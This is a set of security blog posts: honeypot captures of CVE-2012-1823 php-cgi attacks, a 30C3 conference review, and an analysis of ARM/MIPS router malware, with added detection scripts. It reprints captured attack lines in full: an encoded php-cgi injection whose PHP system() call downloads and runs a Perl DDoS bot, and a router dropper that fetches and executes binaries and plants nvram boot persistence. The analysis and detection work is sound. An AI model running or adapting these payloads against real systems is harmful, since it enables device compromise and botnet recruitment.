Undead Security

To be taken with a pinch of salt

CVE-2012-1823 / BKO


Glastopf

I’ve been watching my little Glastopf honeypot for a while now, but it’s only recently become very useful. Lukas finally sat his butt down and put some time into the PHP sandbox, so the attacks targeting the CVE-2012-1823 vulnerability are now much more readable.

Previously I’d just see something like this in my logs:

2014-03-13 01:01:21,335 (glastopf.glastopf) 222.92.253.142 requested POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E

Whereas now I’m seeing this:

POST //cgi-bin/php/index.php/cgi-binphp/cgi-binphp5/cgi-binphp-cgi/cgi-binphp.cgi/cgi-binphp4/phppathphp/phppathphp5/local-binphp/local-binphp5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Content-Length: 264
Content-Type: application/x-www-form-urlencoded
Host: -h

<? system("killall -9 perl;killall -9 php;cd /tmp;wget ftp://199.71.214.66/bko -O /tmp/bko; curl -O ftp://199.71.214.66/bko -O /tmp/bko;fetch -U ftp://199.71.214.66/bko -O /tmp/bko;lwp-download ftp://199.71.214.66/bko -O /tmp/bko;perl /tmp/bko;rm -rf /mpbko*"); ?>

Admittedly this is a little cleaned up by a small script I wrote, but the important bit is the PHP code at the end. Here we can see the attacker’s true intent.
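What’s hiding in that hex is easier to see decoded, and the decoded form is also what a log scanner should key on. Below is an added example of mine, not code from this post or from Glastopf: it decodes the request target from the first log line above, pulls out the php.ini directives being passed with -d, and flags the request when it points at a php-cgi path, has no literal “=” in the raw query string (the condition under which php-cgi takes the query string as command-line arguments, which is what CVE-2012-1823 is about) and carries one of the directives used to turn on remote or stdin code inclusion. The request target is the page’s own; the list of php-cgi filenames comes from the paths in the second log excerpt; everything else is mine.

```python
import re
from urllib.parse import unquote_plus

# php.ini directives that only make sense on php-cgi's command line if the intent is to
# turn the interpreter against its host; every one of them appears in the probe above.
SUSPICIOUS_DIRECTIVES = {
    "allow_url_include", "auto_prepend_file", "auto_append_file", "safe_mode",
    "disable_functions", "open_basedir", "suhosin.simulation",
    "cgi.force_redirect", "cgi.redirect_status_env",
}

# php-cgi binary names seen in the probe paths on this page (php, php4, php5, php-cgi, php.cgi)
PHP_CGI_PATH = re.compile(r"/php(?:4|5|-cgi|\.cgi)?(?:/|$)", re.IGNORECASE)

# The request target from the first Glastopf log line above (method and timestamp dropped).
SAMPLE_TARGET = (
    "/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E"
    "+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66"
    "+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E"
    "+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22"
    "+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65"
    "+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74"
    "+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30"
    "+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30"
    "+%2D%6E"
)


def decode_query(raw_query):
    """Percent-decode the query string ('+' is a space). The probe hex-encodes even the
    '-d' and the '=' so that the raw string contains no literal '=': only then does
    php-cgi treat the query string as command-line arguments."""
    return unquote_plus(raw_query)


def directives_in(decoded_query):
    """Map each '-d name=value' pair in the decoded argument string to its value."""
    found, tokens = {}, decoded_query.split()
    for i, tok in enumerate(tokens):
        if tok == "-d" and i + 1 < len(tokens):
            name, _, value = tokens[i + 1].partition("=")
            found[name] = value.strip('"')
    return found


def analyse_request_target(request_target):
    """Return the decoded arguments, the directives found and a probe verdict."""
    path, _, raw_query = request_target.partition("?")
    decoded = decode_query(raw_query)
    directives = directives_in(decoded)
    tokens = decoded.split()
    probe = (PHP_CGI_PATH.search(path) is not None
             and "=" not in raw_query                        # a literal '=' stops the argv treatment
             and bool(tokens) and tokens[0].startswith("-")  # argv-style: -d ..., -n, -s
             and (any(name in SUSPICIOUS_DIRECTIVES for name in directives) or "-s" in tokens))
    return {"probe": probe, "decoded": decoded, "directives": directives}


def is_cve_2012_1823_probe(request_target):
    return analyse_request_target(request_target)["probe"]


if __name__ == "__main__":
    result = analyse_request_target(SAMPLE_TARGET)
    print("probe:", result["probe"])
    print("decoded:", result["decoded"])
    for name, value in result["directives"].items():
        print("  -d %s=%s" % (name, value))
```

Run against the log line it prints the decoded argument string (allow_url_include=on, auto_prepend_file=php://input and the rest) and a probe verdict of True; a normal request such as /cgi-bin/php?page=1 has a literal “=” in the raw query and is left alone. Decoding before matching matters: a rule that looks for the literal text “allow_url_include” in the raw request line never fires on this traffic.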

BKO

So the attackers want to pull down a Perl script called “bko” via a couple of different methods. In my very limited research time on this, I’ve seen attacks from the following sources:

 2014-02-20 14:23:49 - 66.219.100.178
 2014-02-20 18:29:45 - 162.248.167.168
 2014-02-21 20:22:10 
 2014-02-22 21:39:22 - 203.101.179.28
 2014-02-23 12:20:22
 2014-02-23 15:33:06 
 2014-02-24 14:17:33 
 2014-02-24 16:41:27 
 2014-02-28 21:09:27 - 87.238.192.50
 2014-03-01 00:19:19 
 2014-03-01 06:29:31 
 2014-03-01 18:37:42 
 2014-03-02 19:34:30
 2014-03-03 15:56:07 
 2014-03-05 08:33:23 

Attacking Hosts:

203.101.179.28 | origin-as 9541 (203.101.179.0/24) | as-path 5413 1273 8529 38193 9541 | CYBERNET | CYBER INTERNET SERVICES (PVT.) LTD. (Pakistan, Punjab, Lahore)

162.248.167.168 | origin-as 55053 (162.248.160.0/21) | as-path 5413 6939 36493 55053 | CLOUD-10 | KW Datacenter (Canada, Ontario, Kitchener)

66.219.100.178 | origin-as 10843 (66.219.96.0/20) | as-path 5413 1299 209 22561 5778 10843 | AITNET-2 | Advanced Internet Technologies, Inc. (United States, Alabama, Hoover)

87.238.192.50 | origin-as 42730 (87.238.192.0/21) | as-path 5413 13237 25394 42730 | EVANZO-2010A | EVANZO e-commerce GmbH Infrastructure (Germany, Berlin, Berlin)

It’s a varied mix of attackers. I’m not going to make any assumptions as to the source or the intent, but looking at the script they download we can see that they probably want to launch some good old fashioned DDoS attacks. Yes, the command and control is done via IRC. At some point I may dig into this, but currently I can’t be asked.

The point here is that attackers are still using fairly simple methods and definitely old attacks. CVE-2012-1823…come now. Still, it’s clearly working or they wouldn’t be so actively scanning for it. Even more importantly, I’m hoping more people will use Glastopf and even contribute to the code base. It’s a great little honeypot and a great source of intel for me. Even if that intel is fairly uninteresting in the grand scheme of things.

Peas out girl scout…

30C3 Summary of Awesomeness


30C3 happened in Hamburg at the end of December 2013. I’d never been before so I was looking forward to it. Having never been or known that many people that have been, I had no preconceived ideas as to what I was in for. Little did I know that I’d learn stuff, write more code than I probably should at a conference and realise that you don’t have to mission to Las Vegas to experience a great conference.

The TL;DR version of this blog post is “Go to 31C3..it’ll rock your panties”

Interesting talks

So many interesting talks happened. The great thing about 30C3 is that if a talk is in German (which quite a few are), you don’t have to miss out on anything. You can pull up the translated stream and watch that or even listen in on the translation on your DECT phone. Yes, there is a GSM network running at 30C3. No, I probably wouldn’t connect to it with my stupid iPhone. Especially after watching ioerror’s talk on Sunday/Monday.

Having access to the live stream was also awesome in that you never had to miss out on a talk if you were hacking away at something in another room. This happened to me a few times. And it also happened when the rooms filled up quickly. Thank god for the overflow to Saal 2 for the keynote is all I can say…

Anyway, talks…here’s what I caught and why I thought they were interesting. Most of them will be on the official media page by the time you read this so pick them up there.

10 Years of Fun with Embedded Devices

This was a little dry for my liking. It was a good overview of the OpenWRT project over the last 10 years. Having never used the project it was cool to see how it evolved over the years.

Electronic Bank Robberies

This was a very interesting talk up until the time I got kicked out of the aisle. While it wasn’t new tech or anything, it was interesting to see how the malware authors were attacking ATMs. All it really proved was that physical access beats everything.

Greenwald Keynote

The highly anticipated keynote for 30C3. Saal 1 filled up very quickly so we managed to get a seat at the back of Saal 2. Glenn Greenwald gave a very interesting talk about the whole Snowden / NSA incident. It was great to hear that things like GPG/PGP are starting to catch on outside of our circles. The passion and dedication shown by Glenn and his colleagues left me with a little more hope for humanity than before 30C3. I suggest that you watch this.

Hillbilly Tracking of Low Earth Orbit

Very interesting talk by Travis on tracking satellites (I think). Travis has been doing awesome stuff with satellites and radio stuff for longer than I’ve had a drinking problem. You should also check out PoC||GTFO.

My journey into FM-RDS

Really interesting talk by Oona. She described how she discovered a signal while listening to her radio one evening. She then reversed said signal and discovered some awesomeness behind it. While I’m not very into the SDR/radio side of things, it was a very interesting talk. The way it was delivered was also great. Very understated with some rather awesome sauces just dropped without the usual flashy showmanship you usually expect with something like this. Must be a Scandinavian thing :)

FPGA 101

I was hoping for a little more from this talk. I’m putting my lack of enthusiasm for this talk down to a lack of Mate at that particular time. Really it was a good talk about FPGAs. I’ll probably catch the recording again just to make sure…

The Year in Crypto

Moral of this story, don’t put crypto talks late at night when people have been up most of the night before…

I will catch the recording of this talk again as it’s something I’d like to learn more about.

SCADA StrangeLove 2

A buddy said I should watch this. It was a pretty interesting talk on SCADA stuff but I got the feeling that it was a little too much “look how awesome we are” more than anything…but by this time I was fairly grumpy. I’m not a nice person when I’m grumpy.

RFID Treehouse of Horror

This was a great talk on the use and abuse of RFID in Austria. The speaker gave a good overview on how we got to this point. The information on the tech involved was great. I’ve been tinkering with RFID for a while and this talk definitely gave me a few ideas that should help me get over some of my own hurdles.

X Security

Another talk suggested by a buddy (damn you BSB). This was an interesting talk on X security. We’ve long known that there are bugs in software. The speaker just showed that the situation is a little worse in X :)

To Protect And Infect (part one)

A pretty good talk on the use of malware by nation states. I got the feeling that there wasn’t anything new here. It seemed to be a rehash of what they had already showed in previous blog posts and the like. Again, grumpy…

Virtually Impossible: The Reality Of Virtualization Security

I need to review this post. Mostly because it affects me directly. As it does the OpenSSL project it seems.

OpenSSL

CounterStrike

What I caught of this talk was pretty good. Unfortunately a dinner run was made right in the middle so I missed a vast portion of the good bits.

Through a prism, darkly

This was probably one of the best talks I’d seen on the whole NSA thing. Other than @ioerror’s of course. The speaker gave a great overview of all the TLAs, tech and laws involved in the NSA shit pie. If you’re looking for an overview from a law and tech point of view, I’d definitely review this talk.

All in all there was a great cross section of talks. Not many other conferences cater for the various types of hackers that turn up at events like this. And let’s not even talk about the workshops. I didn’t manage to make it to any of them but there were a couple that I’d like to have made had there not been something else on at the same time.

Shit BSB says…

BSB posed a simple question to me at some point during the conference. I say simple, but given that we’d all been up for a silly amount of time and were now powered mostly by a heady mixture of Mate, beer and chilli, it was anything but. But I digress…

The question he posed was “what was the best 5 minutes of the conference for you?” That was a bit of a toughie for me, but I can definitely say there were a few moments when something either clicked, made me laugh or some such shenanigans:

* Jason the SCADA guy - "hey..I this malware sample" "opens IDA" "mass reversing ensues"
* Secret beers and talking satellites and hardware with [fbz](https://twitter.com/fbz) and Travis Goodspeed while drinking delicious IPA
* The "how do I get RFID tag samples quickly and easily" moment...just build something simple and send it back to yourself :)
* The 8km of pneumatic tube system for shooting coloured flashy bottles all over the conference
* Heading somewhere at 3am and seeing a huge mob of people still swarming around doing stuff. 

Shit ioerror says…

So this happened. I really suggest you watch the video here and make up your own mind. Ian Amit also made a good point here.

I’m still trying to process this, but it’s definitely a game changer. I just hope that it gains traction out of our circles. I fear that, while we as a community are very angry and could make changes, the rest of the world may not care enough. Or want to make the necessary changes to improve things. But this is probably a conversation for another day.

Assemblies

This was a new concept for me. It’s probably a thing at DefCon and the other US conferences, but it’s the first time I’ve seen it at such scale. Throughout the conference areas there were tables set up for groups or assemblies of people. Our little hackerspace had a table as did many others. The idea was that if you had a group of people you could get yourself a table and some internet access. This meant you had a little “home base” to come and go from. This was great as you had a comfy place to sit and hack on stuff if and when the need arose. There were so many different assemblies that I stopped trying to keep track of them all. The guys making alcoholic slushies proved very popular on Saturday night for instance. If you come through to 31C3, I’d recommend getting a group of people together and getting yourself a table and network together…it does help.

Miscellaneous

I couldn’t get anywhere near the large lock pick village/assembly for the vast majority of the weekend. This is both awesome and mildly annoying. Awesome in that so many people wanted to learn more about lock picking and get some much needed practice time in. Not so awesome in that I wanted to be one of these people but never managed it.

Flora Mate is a great alternative to regular Mate. I’d like to have had Mui Mui (I think) Mate, but I haven’t found it outside of Marburg :(

IceFloor for OS X is a gigantic pain in the ass. Yes, I should really just use PF, but fuck it…

Wrap Up

I learned stuff. I felt like I know nothing about computer security. I learned more stuff. More than anything, 30C3 showed me what we as a community of people can do when we put our minds to it. It inspired me (as many of the conferences I have gone to before have) and probably made me think a little bit more about what I’ve been doing and what I should be doing. Mostly I know that I really want to spend more time doing real infosec work, helping where I can and teaching others if I have something to share.

At this point I should probably sign off. It’s been an awesome few days and I need to catch up on some much needed rest before we mission back to real home base. (Note to self, next year…fly or catch a train. The truck is no way to travel long distances).

So thanks to @fbz, @blackswanburst, @travisgoodspeed, @ioerror, @Nickf4rr, @windyoona, @pinkflawd, secret IPA and the @hackeriet crew. There’s a bunch of other people but these guys and girls made the con for me.

Oh and thanks to CTP and the guy who runs Krypton Security for the great dinner at The Bird after closing ceremonies. Great food, card tricks and general hackerynessness.

Finally, go here, download the PDFs and enjoy :)

I know I’ve forgotten stuff and people and things. 30C3 was just that awesome.

Also. Fuck German minimal house. Fuck it hard.

Interesting ARM/MIPS Malware Sample


It’s usually all quiet for my little honeypot in Internetland. But every now and again something interesting will come through. This would definitely be one of those times. I started writing this post at 30C3 simply because someone was gracious enough to sit with me and actually reverse the files I pulled from this attack. He gave me a couple of ideas for what the sample could be, but until we can actually pull out the C&C communications or the second stage payload, this will all be speculation. As you will see when you read this post there is a lot of speculation on what’s happening. I’m hoping this will be the first part in a series as I dig into this malware sample.

The Attack

A user from 186.47.114.23 logged into my pot in the middle of December with the username and password combination “root / admin”. Here’s the session recording:

~# shell
bash: shell: command not found

~# cd /var/run
-bash: cd: /var/run: Not a directory

~# wget http://bnry.jorgee.nu//wgsh
--2013-12-15 15:09:40--  http://bnry.jorgee.nu//wgsh
Connecting to bnry.jorgee.nu:80... connected.
HTTP request sent, awaiting response... test ! -e wgsh && busybox wget http://bnry.jorgee.nu///bbsh
sh wgsh
sh bbsh
200 OK
Length: 494 (494bytes) [text/plain; charset=ISO-8859-1]
Saving to: `wgsh

100%[======================================>] 494          0K/s/s  eta 0s

2013-12-15 15:09:42 (0 KB/s) - `wgsh' saved [494/494]

IP / Domain analysis

Using the VirusTotal API I was able to glean this information for the domain:

Checking IP: bnry.jorgee.nu
Message: Domain found in dataset

Passive DNS report for: bnry.jorgee.nu

IP Address: 176.9.51.229  Last seen: 2013-09-22 00:00:00

Detected URLS

URL Detected: http://bnry.jorgee.nu/cron/
\_-> Evilness: 3/51 Scan date: 2013-11-28 21:16:25
URL Detected: http://bnry.jorgee.nu/.cpan_root
\_-> Evilness: 3/51 Scan date: 2013-11-28 21:16:25
URL Detected: http://bnry.jorgee.nu/
\_-> Evilness: 2/50 Scan date: 2013-11-04 01:35:20
URL Detected: http://bnry.jorgee.nu/cron
\_-> Evilness: 2/39 Scan date: 2013-08-29 22:09:59

Looking at the dates of the evilness, we can see that it’s been around for a while. The IP address is different, but that’s no real surprise.

The two IP addresses (218.154.164.110 & 176.9.51.229) found in the VT dataset didn’t reveal anything interesting. I should really get my IPInfo.py script up and running again…

Analysis of the initial payload

So they’re going to wget a file, but the strange thing for me was the “busybox wget…” part. I’ve not seen this before. After chatting with some folks who are a lot more intelligent than me as well as reviewing the file types that were downloaded, it seems that this malware was perhaps intended for a router or switch or some such embedded device. That may or may not explain the “busybox wget” shenanigans…

Here are the contents of “wgsh”, which is a simple shell script:

wget http://bnry.jorgee.nu/bin/tty0 && chmod 700 tty0 && ./tty0 &
wget http://bnry.jorgee.nu/bin/tty1 && chmod 700 tty1 && ./tty1 &
wget http://bnry.jorgee.nu/bin/tty5 && chmod 700 tty5 && ./tty5 &
nvram set rc_firewall="sleep 120
wget http://bnry.jorgee.nu/nvr -P /tmp
sh /tmp/nvr
sleep 172800
reboot"
nvram commit
echo "/etc/persistent/cron" > /etc/persistent/rc.postsysinit
wget http://bnry.jorgee.nu/cron -P /etc/persistent && chmod 700 /etc/persistent/cron
cfgmtd -w -p /etc/
rm -rf wgsh

So the script attempts a bunch of downloads and then some fun stuff with those downloaded files.

Here’s the “file” output for the files that were downloaded:

cron:      ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
init:      ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
nvr:       ASCII text, with CRLF line terminators
sys:       ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
tty0:      ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
tty1:      ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
tty5:      ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped

Strangeness

Before we dig into this, what was more interesting was that a couple of days after this initial attack, I had a repeat visit. The attack was the same, only the downloaded file was slightly different. Here’s the diff…

1,3c1,3
< wget http://bnry.jorgee.nu/bin/tty0 && chmod 700 tty0 && ./tty0 &
< wget http://bnry.jorgee.nu/bin/tty1 && chmod 700 tty1 && ./tty1 &
< wget http://bnry.jorgee.nu/bin/tty5 && chmod 700 tty5 && ./tty5 &
---
> wget http://bnry.jorgee.nu/bin/tty0 -P /var/run && chmod 700 /var/run/tty0 && /var/run/tty0 &
> wget http://bnry.jorgee.nu/bin/tty1 -P /var/run && chmod 700 /var/run/tty1 && /var/run/tty1 &
> wget http://bnry.jorgee.nu/bin/tty5 -P /var/run && chmod 700 /var/run/tty5 && /var/run/tty5 &

Seems someone made a quick fix to the script file as it may have failed. Either that or they didn’t notice that the “cd /var/run” command failed in their first stage script. I wonder if this was just a generic fix or if someone actually checked the output from their initial attack and made adjustments accordingly.

Onward to scripting shenanigans

Looking at the script file “nvr”, we have a couple of commands I’m not too familiar with. One of the commands also highlights why this script probably failed…IF it errors out like I think it would…

nvram set rc_firewall="sleep 120
wget http://bnry.jorgee.nu/nvr -P /tmp
sh /tmp/nvr
sleep 172800
reboot"

Would this script work? Looking at it, I’d say no because of the broken inverted comma thing. But having never seen this command before, I could be wrong. It’s at this point of writing this blog post that I reach for a Flora Mate and do a little digging on the nvram command…

A quick Google search for “nvram set rc_firewall” brings up the DD-WRT wiki page which could give an indication as to what the Malware sample was looking for…

I’d say that this little piece of awesomeness is an attempt at persistence on the affected device. It’s going to add a little bit of scripting to the rc_firewall. The script will download and run the three files mentioned previously, sleep for a while and then reboot, every time the box/server/device boots. It’s also a little sneakier than saving to rc_startup (if I understand this correctly), which is probably what a savvy tech would look at first when troubleshooting / performing incident response.

Looking at the next couple of lines in our script we get

echo "/etc/persistent/cron" > /etc/persistent/rc.postsysinit
wget http://bnry.jorgee.nu/cron -P /etc/persistent && chmod 700 /etc/persistent/cron

This is plainly an attempt at persistence on the device. Unfortunately the “cron” file is stripped and encoded (more on this later) so getting the actual payload for the file is going to be tough.

The last couple of lines

cfgmtd -w -p /etc/
rm -rf wgsh

are finishing things up. The cfgmtd command will write the changes to /etc to flash and allow the device to be rebooted without things going too horribly wrong. I’m not entirely sure why they did this after the first “nvram commit”. Perhaps to separate the two attempts at persistence. Finally the attackers remove any trace of their initial infection.
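The rc_firewall hook is the piece I’d want to be able to spot on a box I was looking at. As an added example (mine, not from the post and not DD-WRT’s own tooling), here’s a small check over an nvram dump that pulls the startup hooks out and flags any that fetch from the network, run something out of /tmp, or reboot. The dump format (name=value, one variable per line, the shape I know `nvram show` to print) and the non-hook keys are assumed; the rc_firewall value is the one the wgsh script above sets; treating rc_shutdown as a hook alongside rc_startup and rc_firewall is an assumption too.

```python
import re

# nvram variables DD-WRT runs as shell scripts at boot / firewall setup / shutdown. The post
# shows rc_firewall being abused and mentions rc_startup; rc_shutdown is an assumption.
HOOK_VARS = ("rc_startup", "rc_firewall", "rc_shutdown")

# Things a boot hook on a home router should never need to do: fetch from the network,
# run something out of /tmp, or reboot the box.
SUSPICIOUS = re.compile(r"\b(?:wget|curl|fetch|tftp)\b|\bsh\s+/tmp/\S+|\breboot\b")


def parse_nvram_dump(text):
    """Parse 'name=value' lines (assumed nvram show format). A hook value can span several
    lines, as the rc_firewall one in this post does, so a line that does not start with
    'name=' is treated as a continuation of the previous variable's value."""
    variables, current = {}, None
    for line in text.splitlines():
        m = re.match(r"^([A-Za-z0-9_.:-]+)=(.*)$", line)
        if m:
            current = m.group(1)
            variables[current] = m.group(2)
        elif current is not None:
            variables[current] += "\n" + line
    return variables


def suspicious_hooks(variables):
    """Return (variable, [matched fragments]) for every boot hook that fetches or executes."""
    findings = []
    for name in HOOK_VARS:
        matches = SUSPICIOUS.findall(variables.get(name, ""))
        if matches:
            findings.append((name, matches))
    return findings


# Constructed dump: a few ordinary-looking settings (made up) plus the rc_firewall hook that
# the wgsh script above installs (that value is the page's own).
SAMPLE_DUMP = """\
wan_proto=dhcp
lan_ipaddr=192.168.1.1
rc_startup=
rc_firewall=sleep 120
wget http://bnry.jorgee.nu/nvr -P /tmp
sh /tmp/nvr
sleep 172800
reboot
router_name=dd-wrt
"""

if __name__ == "__main__":
    for name, hits in suspicious_hooks(parse_nvram_dump(SAMPLE_DUMP)):
        print("%s: %s" % (name, ", ".join(hits)))
```

On the sample this reports rc_firewall with wget, sh /tmp/nvr and reboot, and stays quiet on an rc_firewall that only holds iptables rules. The same idea applies to /etc/persistent/rc.postsysinit on the devices that have it: anything that hook points at should be something you put there.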

The downloaded files

Unfortunately I can’t really give too much information on the downloaded files as the reversing done on them was definitely above my pay grade. I’ll see if the guy who did the grunt work is keen to give a little more information…

Again…

cron:      ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
init:      ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
sys:       ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
tty0:      ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
tty1:      ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
tty5:      ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped

And file sizes…

-rw-r----- 1 matt users 45232 Dec 18 04:29 cron 
-rw-r----- 1 matt users 16772 Dec 18 04:28 init
-rw-r----- 1 matt users 42212 Dec 18 04:29 sys
-rw-r----- 1 matt users 16748 Dec 18 04:26 tty0
-rw-r----- 1 matt users 45228 Dec 18 04:26 tty1
-rw-r----- 1 matt users 42184 Dec 18 04:27 tty5

Looking at the file sizes I’d say that this is the relationship:

tty0 <-> init
tty1 <-> cron
tty5 <-> sys

And of course hashes…

183b4579e1d448c0c6533c851ed8b959  cron
83ac4c0b49fdf37e99d0368a8ea17dfa  init
58caa788562e2599ca3b4358fde59e80  sys
0019e3d469ba61f8b925b1c8599dccc6  tty0
1217d1400648c64181c891e4a187f079  tty1
270d3b9b7c8a37d0ead112c67e274619  tty5

I should probably run these files through ssdeep…

Pushing the files through strings doesn’t yield anything interesting. The fact that they’re stripped doesn’t help at all either. The guy who helped with the reversing mentioned a couple of things (I’m paraphrasing here):

* The files aren't packed even though at first glance it seems like it
* There is a "second stage" ELF file hidden inside the first ELF file. A not so simple shifting scheme is hiding them from analysis.
* The second stage is likely the same size as the memory space allocated by the original ELF

This was the interesting part for me. It looks to me like the authors are hiding the good stuff inside the existing ELF binary much as you would do with a secondary infector/payload in the resources section of a PE file. Why they didn’t just pack it is beyond me currently. The reversing done on these files was quick and dirty between dinner and talks at 30C3 so it’s definitely not a complete pass. The reverser mentioned that with a couple of well placed breakpoints and a debugger, you could get to the payload of the files. Unfortunately neither of us had an ARM or MIPS based system with a debugger setup and ready to go. I may see if I can do something with my Raspberry Pi tomorrow…
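The `file` output above and the reverser’s note about a second ELF hidden inside the first suggest two checks worth automating. The following is an added example of mine, not code from the post or from the person who did the reversing: it reads the ELF identification bytes the way `file` does (word size, LSB/MSB, MIPS/ARM) and then scans for a second ELF header inside the blob, first as plain bytes and then under a single-byte XOR. The sample binaries are constructed minimal headers, not the actual cron/tty files, and the XOR is a stand-in: the post doesn’t say what the “shifting scheme” is, so on a real sample that scheme would have to be worked out before the scan finds anything.

```python
import struct

ELF_MAGIC = b"\x7fELF"
# e_machine values for the two architectures in the "file" output above (from the ELF spec)
E_MACHINE = {0x08: "MIPS", 0x28: "ARM"}


def parse_elf_ident(blob, offset=0):
    """Decode e_ident plus e_type/e_machine at `offset`: the facts "file" prints (word size,
    LSB/MSB byte order, architecture). Returns None when there is no valid header there."""
    hdr = blob[offset:offset + 20]
    if len(hdr) < 20 or hdr[:4] != ELF_MAGIC:
        return None
    ei_class, ei_data = hdr[4], hdr[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        return None
    fmt = "<" if ei_data == 1 else ">"          # EI_DATA says how to read the rest of the header
    e_type, e_machine = struct.unpack(fmt + "HH", hdr[16:20])
    return {"bits": 32 if ei_class == 1 else 64,
            "order": "LSB" if ei_data == 1 else "MSB",
            "machine": E_MACHINE.get(e_machine, hex(e_machine)),
            "type": e_type}


def find_embedded_elf(blob):
    """Offsets (after 0) where a second, unobfuscated ELF header starts inside the file."""
    hits, pos = [], blob.find(ELF_MAGIC, 1)
    while pos != -1:
        if parse_elf_ident(blob, pos):
            hits.append(pos)
        pos = blob.find(ELF_MAGIC, pos + 1)
    return hits


def find_xor_hidden_elf(blob):
    """Same scan for an inner ELF obscured with a single-byte XOR: try every key and accept a
    hit only if the de-obfuscated bytes parse as a header. Returns (offset, key) pairs."""
    hits = []
    for key in range(1, 256):
        needle = bytes(b ^ key for b in ELF_MAGIC)
        pos = blob.find(needle, 1)
        while pos != -1:
            if parse_elf_ident(bytes(b ^ key for b in blob[pos:pos + 20])):
                hits.append((pos, key))
            pos = blob.find(needle, pos + 1)
    return hits


def make_header(order, e_machine, bits=32):
    """Constructed minimal ELF header (e_ident, e_type, e_machine, e_version); not real malware."""
    fmt = "<" if order == "LSB" else ">"
    ident = ELF_MAGIC + bytes([1 if bits == 32 else 2, 1 if order == "LSB" else 2, 1, 0]) + b"\x00" * 8
    return ident + struct.pack(fmt + "HHI", 2, e_machine, 1)   # ET_EXEC, machine, EV_CURRENT


# Constructed sample: a MIPS big-endian "outer" binary (like cron/tty1 above) with an ARM
# little-endian "inner" one appended after 200 bytes of padding, plain and then XOR'd.
OUTER = make_header("MSB", 0x08) + b"\x00" * 200
INNER = make_header("LSB", 0x28) + b"\x00" * 40
PLAIN_SAMPLE = OUTER + INNER
XOR_KEY = 0x5A
HIDDEN_SAMPLE = OUTER + bytes(b ^ XOR_KEY for b in INNER)

if __name__ == "__main__":
    print(parse_elf_ident(PLAIN_SAMPLE))
    print("plain inner ELF at:", find_embedded_elf(PLAIN_SAMPLE))
    print("plain scan of xor'd sample:", find_embedded_elf(HIDDEN_SAMPLE))
    print("xor scan of xor'd sample:", find_xor_hidden_elf(HIDDEN_SAMPLE))
```

The plain scan finds the inner header at offset 224 in the first sample and nothing in the second; the XOR scan recovers the second one as (224, 0x5A). The point of requiring a full header parse after the magic match is to keep the key space brute force from reporting every four-byte coincidence as a hit.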

In summary (sort of)

I’d say the malware here is possibly something looking to infect and stay on a router or switch out there on the Internet. With all the files that were involved it’s likely that this wasn’t the only intention of the malware. I’d be very surprised if there wasn’t a DNS redirection payload involved. Hopefully someone will be able to dig out the payload from the files and complete the picture.

Comics Lead to Malware


I was catching up on my daily comics after work this evening when something popped up on screen that I wasn’t quite expecting. I was using my Nexus 7 at the time which doesn’t have Ad Block installed for some stupid reason. I should probably look at securing this bad boy a little more.

Summary

The first thing I did was look at the two domains that the malicious ad (this is what I am assuming caused these shenanigans) talked to.

